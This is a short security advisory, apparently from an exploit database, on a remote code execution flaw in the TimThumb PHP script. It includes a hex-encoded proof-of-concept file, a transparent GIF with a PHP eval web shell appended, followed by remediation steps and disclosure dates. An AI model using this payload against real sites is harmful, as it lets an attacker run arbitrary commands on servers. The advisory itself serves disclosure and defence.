Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer)
-:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.
Proof of Concept File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
(Transparent GIF + <?php @eval($_GET['cmd']) ?>
-:: Solution ::- Update to the latest version 1.34 or delete the timthumb file.
NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb
Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011